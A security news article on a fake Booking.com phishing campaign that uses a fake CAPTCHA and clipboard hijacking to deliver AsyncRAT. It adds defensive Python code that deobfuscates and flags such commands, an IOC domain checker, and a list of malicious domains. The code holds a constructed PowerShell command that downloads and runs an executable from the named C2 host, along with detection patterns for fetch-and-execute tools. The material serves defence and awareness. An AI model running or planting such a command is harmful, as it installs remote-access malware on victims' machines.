A rapidly evolving phishing campaign is exploiting the popularity of online travel bookings by leveraging fake Booking.com sites to deploy the dangerous Backdoor.AsyncRAT malware.
Since mid-May, security researchers at Malwarebytes have tracked this campaign as it spreads through redirect links on gaming websites, social media, and sponsored advertisements, luring unsuspecting travelers searching for hotel deals and accommodations.
This approach is particularly effective, as 40% of users reportedly rely on general online searches for booking travel arrangements, making them a ripe target for cybercriminals.
The threat actors behind the campaign are constantly rotating their malicious domains, changing the landing page URLs every two to three days to evade blacklists and security detections.
Fake Captcha and Clipboard Hijacking
Upon clicking a booby-trapped link, users are redirected through a series of intermediary sites, ultimately landing on a webpage meticulously designed to resemble Booking.com.
According to the Malwarebytes report, the fraudulent site opens with a deceptive security check: a fake CAPTCHA prompt.

Unlike a legitimate CAPTCHA, this one serves a sinister purpose: the click it asks for is the user gesture the page needs in order to write attacker-chosen text, a malicious command, into the victim's clipboard.
Once the user completes the prompt, the site instructs them to open the Windows Run dialog (Win+R), paste the clipboard contents, and press Enter.
This method is particularly insidious because it co-opts the victim into launching a PowerShell command on their own device, something no genuine CAPTCHA or booking platform ever asks for.
The PowerShell script itself is heavily obfuscated, employing mixed casing, erratic quote usage, and variable manipulation to evade casual inspection and automated security tools.

Deobfuscated, it connects to a command-and-control server (such as bkngnet[.]com) to download and execute further malicious payloads, specifically ckjg.exe and subsequently Stub.exe.
These executables are identified as carriers of Backdoor.AsyncRAT, a powerful remote access trojan.
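The normalizer and clipboard check below are an added example, not Malwarebytes' code and not the campaign's script. It undoes the three obfuscation tricks the article names (mixed casing, spliced quotes, variable indirection) on a constructed command, then applies the kind of heuristic a clipboard guard can use to flag such text before it ever reaches the Run dialog. The sample command, the local file path and the indicator list are assumptions for illustration; the trailing "# I am not a robot ..." comment is a decoration commonly seen in these lures, not something the article describes, and is included so the heuristic covers it.

```python
import re

# Constructed sample written in the style the article describes (mixed casing,
# quote splicing, variable indirection). It is NOT the campaign's real command:
# the defanged C2 host is the one the article names, the local path is a
# placeholder, and nothing in this module ever executes it.
SAMPLE_CLICKFIX = (
    r"$u='h'+'ttps://bkngnet[.]com/ckjg.exe';$p='c:\users\public\c.exe';"
    'PoWeRsHeLl -W hIdDeN -eP bYpAsS -c "I`wR $u -OutFile $p; sTaRt-PrOcEsS $p" '
    "# I am not a robot - reCAPTCHA Verification ID: 7391"
)


def strip_backticks(cmd):
    # In PowerShell a backtick before an ordinary letter is a no-op, so
    # "I`wR" is just "IwR". Keep the backtick where it is a real escape
    # (`n, `t, `r, `0, `a, `b, `f, `v, `$, `").
    return re.sub(r'`(?![ntr0abfv$"`])', "", cmd)


_SPLICES = [
    re.compile(r"'([^']*)'\s*\+\s*'([^']*)'"),
    re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"'),
]


def join_spliced_strings(cmd):
    # 'h'+'ttps://...' -> 'https://...'; loop until nothing left to join.
    prev = None
    while prev != cmd:
        prev = cmd
        for pat in _SPLICES:
            quote = pat.pattern[0]
            cmd = pat.sub(lambda m, q=quote: q + m.group(1) + m.group(2) + q, cmd)
    return cmd


_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;")


def inline_variables(cmd):
    # Resolve simple $x='literal'; assignments and substitute later uses of $x.
    # The replacement is a lambda so backslashes in Windows paths stay literal.
    bindings = {}

    def grab(m):
        bindings[m.group(1)] = m.group(3)
        return ""

    cmd = _ASSIGN.sub(grab, cmd)
    for name, value in bindings.items():
        cmd = re.sub(r"\$" + re.escape(name) + r"(?!\w)", lambda _m, v=value: v, cmd)
    return cmd


def normalize(cmd):
    cmd = strip_backticks(cmd)
    cmd = join_spliced_strings(cmd)
    cmd = inline_variables(cmd)
    return re.sub(r"\s+", " ", cmd).strip().lower()


# Indicators evaluated on the normalized (lower-cased) text. Assumed list.
INDICATORS = {
    "powershell_launch": r"\b(?:powershell|pwsh|mshta|cmd(?:\.exe)?)\b",
    "hidden_window": r"-w(?:indowstyle)?\s+(?:hidden|1)\b",
    "policy_bypass": r"-(?:ep|exec|executionpolicy)\s+bypass\b",
    "remote_fetch": r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|downloadstring|downloadfile)\b",
    "execute_payload": r"\b(?:iex|invoke-expression|start-process|saps|rundll32|regsvr32)\b",
    "url": r"https?://",
    "captcha_decoy": r"#[^#]*(?:robot|captcha|verif)",
}


def assess_clipboard_text(text):
    """Return the normalized text, the indicators that fired, and a verdict."""
    norm = normalize(text)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
    launch = "powershell_launch" in hits
    action = any(h in hits for h in ("remote_fetch", "execute_payload", "url"))
    return {
        "normalized": norm,
        "indicators": hits,
        "suspicious": (launch and action) or len(hits) >= 3,
    }


WARNING = ("WARNING: this text was copied by a web page and looks like a malware "
           "installer command. Do not paste it into Run or a terminal. ")


def guard_clipboard(text):
    """What a clipboard guard hands to the OS: the text unchanged, or the text
    with a visible warning prepended when it looks like a ClickFix command."""
    return WARNING + text if assess_clipboard_text(text)["suspicious"] else text
```

The warning is prepended rather than appended on purpose: the Run dialog treats the first token of the line as the program to launch, so a line that starts with "WARNING:" fails to run, whereas anything added after the `#` would just be a PowerShell comment and the command would still execute. Real tooling should also handle `cmd /c`, `mshta` and `msiexec` variants and use the Public Suffix List when it inspects the URL.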
The Danger of AsyncRAT
Backdoor.AsyncRAT grants attackers full remote control over infected devices. Once embedded, it can exfiltrate sensitive data, log keystrokes, record screens, and even commandeer webcams and microphones.
The implications are severe: affected users risk financial loss, identity theft, and long-term surveillance until the threat is eradicated.
While browsers like Chrome display generic warnings when clipboard access is triggered, such alerts may fail to properly communicate the gravity of the threat to most users.
Security solutions like Malwarebytes Browser Guard take an additional step by flagging suspicious clipboard activity and appending warning messages to potentially destructive commands, effectively neutralizing the immediate risk. However, users lacking such layered protections remain dangerously exposed.
In this era of relentless malware innovation, user awareness and proactive cyber hygiene are the best defenses.
Users should never execute commands provided by unfamiliar websites and must scrutinize prompts that request permission to interact with system features like the clipboard or the Windows Run utility.
Deploying reputable anti-malware solutions, enabling browser-based protection against malicious scripts and domains, and maintaining vigilance while booking travel online are essential practices.
Disabling JavaScript prevents clipboard hijacking by blocking the functions a page uses to write to the clipboard, such as document.execCommand('copy') and navigator.clipboard.writeText(), but this often impairs the functionality of legitimate sites.
A practical workaround is to use separate browsers: one restricted for general browsing with enhanced security settings, and another for accessing trusted sites and web applications.
As cybercriminals continue to refine their techniques and rotate their infrastructure every few days to stay ahead of blocklists, robust endpoint protection and informed skepticism remain critical.
Staying informed and treating any page that asks you to paste something into Run or a terminal as hostile is fundamental, as attackers continue to target high-traffic platforms with advanced social engineering and technical tactics.
IOCs Table
| Domain/Subdomain |
|---|
| booking.chargesguestescenter[.]com |
| booking.badgustrewivers.com[.]com |
| booking.property-paids[.]com |
| booking.rewiewqproperty[.]com |
| booking.extranet-listing[.]com |
| booking.guestsalerts[.]com |
| booking.gustescharge[.]com |
| kvhandelregis[.]com |
| patheer-moreinfo[.]com |
| guestalerthelp[.]com |
| rewiewwselect[.]com |
| hekpaharma[.]com |
| bkngnet[.]com |
| partnervrft[.]com |
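Because the landing domains rotate every two to three days, an exact IOC match is only a starting point. The checker below is an added example (not from Malwarebytes or the article): it matches a host against the table above, and it also flags the pattern the table itself shows, a "booking." label or a "bkng" fragment placed on a registrable domain that is not booking.com. The registrable-domain rule (last two labels) is a simplification assumed for this example; production code should use the Public Suffix List (for instance the tldextract package). The "rotated-domain-example" and "bkngverify-example" hosts in the test are constructed.

```python
from urllib.parse import urlparse

# Hostnames copied from the article's IOC table, kept defanged with [.].
ARTICLE_IOCS = [
    "booking.chargesguestescenter[.]com",
    "booking.badgustrewivers.com[.]com",
    "booking.property-paids[.]com",
    "booking.rewiewqproperty[.]com",
    "booking.extranet-listing[.]com",
    "booking.guestsalerts[.]com",
    "booking.gustescharge[.]com",
    "kvhandelregis[.]com",
    "patheer-moreinfo[.]com",
    "guestalerthelp[.]com",
    "rewiewwselect[.]com",
    "hekpaharma[.]com",
    "bkngnet[.]com",
    "partnervrft[.]com",
]

REAL_BRAND = "booking.com"          # the registrable domain being impersonated
BRAND_TOKENS = ("booking", "bkng")  # fragments attackers reuse (assumed list)


def refang(host):
    """Turn a defanged IOC ('a[.]b') back into a comparable hostname."""
    return host.strip().lower().replace("[.]", ".").rstrip(".")


KNOWN_BAD = {refang(h) for h in ARTICLE_IOCS}


def registrable_domain(host):
    # Simplification for this example: registrable domain = last two labels.
    # Wrong for co.uk / com.br style suffixes; use the Public Suffix List there.
    labels = host.split(".")
    return ".".join(labels[-2:])


def classify_host(host):
    """Classify a hostname seen in a redirect chain or a proxy log."""
    h = refang(host)
    if h in KNOWN_BAD:
        return "known_ioc"
    reg = registrable_domain(h)
    if reg == REAL_BRAND:
        return "legitimate_brand"
    subdomain = h[: len(h) - len(reg)].rstrip(".")
    # booking.<anything>.com : brand name pushed into a subdomain of a
    # throwaway registrable domain, exactly the shape of the table above.
    if any(tok in subdomain for tok in BRAND_TOKENS):
        return "brand_subdomain_lookalike"
    # bkngnet.com style: brand fragment inside the registrable domain itself.
    if any(tok in reg.split(".")[0] for tok in BRAND_TOKENS):
        return "brand_in_domain_lookalike"
    return "unknown"


def classify_url(url):
    host = urlparse(url).hostname
    return classify_host(host) if host else "unknown"


def scan_redirect_chain(urls):
    """Return (url, verdict) for every hop that is not clean or the real brand."""
    flagged = []
    for u in urls:
        verdict = classify_url(u)
        if verdict not in ("unknown", "legitimate_brand"):
            flagged.append((u, verdict))
    return flagged
```

Treat "brand_subdomain_lookalike" hits with the same priority as a listed IOC: the registrable domain will be new, but the subdomain trick is what makes the address look right to a traveller glancing at the URL bar.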